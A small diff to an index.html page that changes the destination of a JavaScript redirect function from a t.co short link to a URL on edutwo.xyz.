--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <script type='text/javascript'>
 
   function mover(){
-    window.location = 'https://t.co/GgYtsnQR2H'
+    window.location = 'https://edutwo.xyz/360-2/'
 
   }; 
 
